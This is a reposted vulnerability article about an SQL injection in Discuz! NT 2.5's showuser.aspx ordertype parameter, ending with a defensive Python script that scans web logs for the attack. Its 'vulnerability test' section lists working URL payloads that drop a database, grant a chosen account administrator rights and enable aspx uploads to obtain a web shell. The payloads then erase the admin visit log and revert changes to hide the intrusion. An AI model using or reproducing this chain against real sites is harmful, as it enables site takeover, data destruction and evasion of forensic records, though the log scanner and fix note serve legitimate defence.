Discuz! NT 2.5 latest major vulnerability

Source: Internet
Author: User
Tags: net, sql injection

Users who run Discuz! NT 2.5, or who have just upgraded their forum to Discuz! NT 2.5, should pay attention to this article and promptly check the official website for a fix.

Vulnerability Description: Discuz! NT 2.5 is a powerful community software package for the ASP.NET platform from Kangsheng (Beijing) Technology Co., Ltd. It is built on the .NET Framework, supports SQL Server by default, can be extended to support Access, MySQL and other databases, and runs on IIS5, IIS6 and IIS7. It is safe, efficient, stable and easy to use, makes full use of ASP.NET features, supports free switching of skins, and supports data conversion from a variety of other forums.

Discuz! NT 2.5 strengthens the forum features and improves speed and stability, and its load capacity is also markedly better. On this foundation it also provides feature packages, including commodity trading, personal spaces and photo albums, which users are free to install, showing its strong extensibility. In terms of features, performance and supported environments, it is currently the most sophisticated and mature ASP.NET community software. However, an Isto member found a security vulnerability: a successful exploit can be used to directly modify the administrator's password and enter the admin back end, gaining administrator privileges and control of the entire site.

Vendor: http://www.comsenz.com

Vulnerability Analysis: in Discuz! NT 2.5 (versions before the 20080826 update), the showuser.aspx page does not handle the ordertype variable properly, which leads to SQL injection. A malicious user does not even need to register an account; a carefully constructed ordertype value is enough to exploit this vulnerability.

Vulnerability test:

http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';-- // update to admin

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- // change to aspx so that aspx files can be uploaded

After getting the shell ...

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- // change back to jpg

http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- // delete log

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';-- // cancel admin
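For administrators checking whether a forum was probed this way, the following added example (not part of the original article or of Discuz! NT) scans web server logs for showuser.aspx requests whose ordertype is anything other than a plain sort direction. The log field order, the allowed values and the sample lines are assumptions constructed for illustration.

```python
from urllib.parse import unquote_plus

# Assumption: a legitimate ordertype is a sort direction or empty.
ALLOWED_ORDERTYPE = {"", "asc", "desc"}

# Constructed sample log lines. Assumed field order:
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2008-08-20 10:01:02 GET /bbs/showuser.aspx ordertype=desc&page=2 198.51.100.7 200
2008-08-20 10:01:09 GET /bbs/showuser.aspx ordertype=desc;update+dnt_users+set+adminid='1';-- 203.0.113.9 200
2008-08-20 10:01:15 GET /bbs/showuser.aspx ordertype=DESC%3Bdelete%20from%20dnt_adminvisitlog-- 203.0.113.9 500
2008-08-20 10:02:00 GET /bbs/showtopic.aspx topicid=12 198.51.100.7 200
2008-08-20 10:02:30 GET /bbs/showuser.aspx - 198.51.100.8 200
"""

def ordertype_values(query):
    """Return the URL-decoded values of every ordertype parameter in a raw query."""
    values = []
    # Split on '&' only: ';' must stay inside the value so stacked
    # statements are not hidden by parameter splitting.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "ordertype":
            values.append(unquote_plus(value))
    return values

def suspicious_requests(log_text):
    """Return (timestamp, client_ip, status, ordertype) for non-allow-listed values."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):      # skip blanks and W3C header lines
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, _method, stem, query, ip, status = fields[:7]
        if not stem.lower().endswith("/showuser.aspx"):
            continue
        for value in ordertype_values(query):
            if value.lower() not in ALLOWED_ORDERTYPE:
                hits.append((f"{date} {time}", ip, status, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list comparison is the server-side fix pattern for a sort-direction parameter: accept only the known values and never place the raw string into the ORDER BY clause.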


